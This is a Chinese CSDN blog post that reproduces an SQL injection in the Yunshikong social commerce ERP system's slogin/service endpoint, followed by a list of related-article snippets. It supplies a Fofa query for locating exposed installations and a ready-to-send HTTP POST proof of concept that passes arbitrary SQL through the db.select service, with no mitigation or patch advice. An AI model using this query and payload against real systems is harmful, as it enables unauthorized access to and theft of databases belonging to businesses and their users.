【漏洞复现】云时空社会化商业ERP系统slogin SQL注入漏洞

最新推荐文章于 2024-05-20 17:20:00 发布
最新推荐文章于 2024-05-20 17:20:00 发布
阅读量59 收藏
点赞数
分类专栏: 【漏洞复现】 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/138164795
版权

漏洞描述:

云时空社会化商业ERP系统slogin存在SQL注入漏洞,攻击者可以通过此漏洞获取数据库敏感信息。

搜索语法:

Fofa-Query: app="云时空社会化商业ERP系统"

漏洞详情:

1.云时空社会化商业ERP系统。

2.漏洞POC:

POST /slogin/service?service=db.select HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 

params=%7B%22sql%22%3A%22SELECT+%2A+FROM+V%24VERSION%22%7D

3.漏洞复现结果。

晚风不及你ღ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
订阅专栏
时空社会化商业 ERP 系统 service SQL 注入漏洞复现
0xSec
11-30 904
时空社会化商业ERP service接口处存在SQL注入漏洞,未授权的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息),甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复习】时空社会化商业ERP slogin/service存在SQL注入漏洞
失心少年
04-20 131
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!漏洞链接:http://127.0.0.1/slogin/service?时空社会化商业ERP fileupload/gpy存在SQL注入漏洞
时空商业ERP params 存在SQL注入(含批量验证poc)
weixin_43567873的博客
04-28 23
时空商业ERP params 存在SQL注入(含批量验证poc)
Java Swing+SQL sever学生管理系统代码
weixin_62174595的博客
12-26 2688
高校学生管理系统,Java,SQL sever
服务器下搭建 NFS 网络文件系统
weixin_44453694的博客
08-28 868
网络文件系统,英文Network File System(NFS),是由SUN公司研制的UNIX表示层协议(presentation layer protocol),能使使用者访问网络上别处的文件就像在使用自己的计算机一样。NFS是基于UDP/IP协议的应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。RPC采用了XDR的支持。.........
数据库系统及应用——班级管理系统
吉吉有梦想
08-01 5620
系统在Windows10开发环境下,利用Visual Studio 2015 开发工具,并使用SQL Server2012作为数据库管理系统,来现班级管理系统的各个功能。
JSoup模拟登录新版正方教务系统(内网-教务系统)获取信息过程详解
热门推荐
KI的博客
10-24 9万+
利用JSoup模拟登录校园内网和新版正方教务系统,然后爬取成绩和课表等信息,并展示在APP上。
集群搭建预备操作:在私有上创建与配置虚拟机
howard2005的专栏
02-18 1712
一、登录私有 二、创建项目、组与用户 三、创建实例 四、查看实例 五、查看网络
接口自动化测试实战
小彩虹的博客
05-11 783
接口自动化测试实战 一. 接口关键性名词透析 1.token-令牌 Token也是由服务器产生的,存在服务器的内存或硬盘中 由一套产生规则,会涉及到加密算法 【用Token 来实现登录】 开发提供一个获取Token接口,根据用户名+密码,获取一个Token值-返回一个Token(字符串) Token值服务器通过什么客户端的呢? 通过响应头给客户端。 ------ 次要 通过响应消息体传给客户端。 ---- 主要 通过Cookie传递给客户端 — 很少 3. 请求关联实战 4. request库操作易错点
控制文档类
09-18
if(isset($_POST['slogin'])&&$_POST['slogin']!=""){ $map['slogin']=$_POST['slogin']; $where.=" and a.account like '%%%s%%'"; } if(isset($_POST['phone'])&&$_POST['phone']!=""){ $...
sshd命令 openssh服务器守护进程
01-20
sshd指令是openssh套件中的核心程序,其他的指令(如,sftp-server、slogin、scp)等都是基于sshd命令的。 语法格式: sshd [参数] 常用参数: -4 强制使用IPv4地址 -6 强制使用IPv6地址 -D 以非后台守护...
PsychoLeo:我的GitHub个人资料的配置文件
04-04
另外,法国IOI网站上还提供了je suis inscrit网站,(奥林匹克运动会的26e des utilisateurséligiblespour les: ://www.france-ioi.org/user/perso.php?sLogin=leober),特殊申请书潜水员练习(不要编写动态程序...
winssh:Windows 控制台 SSH2 客户端-开源
06-01
slogin 是一个基于 Windows 控制台的 SSH2,使用 LIBSSH2,带有内置 VT220/xterm-color256 终端仿真器的客户端。 标准 16 加增强控制台 256 色支持均可用(非光栅字体)。 另见,RSH 控制台终端。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 583
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
了解网络安全行业内有哪些公司?
aheyor的博客
05-14 917
https://wenku.baidu.com/view/8de38c790440be1e650e52ea551810a6f424c80f?aggId=f2f58cc8e618964bcf84b9d528ea81c758f52ecc&fr=catalogMain_text_ernie_recall_feed_index%3Awk_recommend_main4&_wkts_=1715651666515&bdQuery=%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 362
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
Upstream最新发布2024年汽车网络安全报告-百度网盘下载
最新发布
qq_18209847的博客
05-20 137
Levy总结道:“在负责保护车队、电动汽车充电站和基础设施的网络安全利益相关者中,对汽车网络安全的重要性日益增加。特别是在GenAI日益普及的情况下,其降低了黑帽子行为者的进入门槛,使他们能够比以往更快、更有效地进行大规模攻击。这份报告的第六版着重介绍了汽车网络安全的拐点:从实验性的黑客攻击发展到规模庞大的攻击,并产生了怎样的影响。另外今年的报告还提供了关于网络攻击的财务影响的独到见解,它提供了一个可操作的框架,用于在现实场景中衡量网络攻击的货币影响。
【linux系统学习教程 Day03】网络安全之Linux系统学习教程,用户和用户组管理,创建用户,删除用户,创建组,删除组....
m0_67844671的博客
05-17 680
【linux系统学习教程 Day03】网络安全之Linux系统学习教程,用户和用户组管理,创建用户,删除用户,创建组,删除组....
date: b'\x02t:558\r\n'
01-15
根据提供的引用内容,我可以为您提供以下答案: 根据引用中的内容,我们可以看到两个文件路径:/[path]/slogin_lib.inc.php和/[path]/slog_users.txt。这些路径可能是某个程序或系统中的文件路径。 根据引用中的内容,String.Format是一个用于格式化字符串的方法。在这个例子中,{0:N2}表示将第一个参数格式化为带有两位小数的数字,{0:D2}表示将第一个参数格式化为两位数的整数,{0:C2}表示将第一个参数格式化为带有两位小数的货币值。 关于您提供的日期字符串"b'\x02t:558\r\n'",它看起来像是一个字节字符串。字节字符串是以字节的形式表示的字符串,其中每个字节都有一个对应的十六进制值。在这种情况下,"b'\x02t:558\r\n'"表示一个包含字节值为02、74、3a、35、35、38、0d和0a的字符串。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值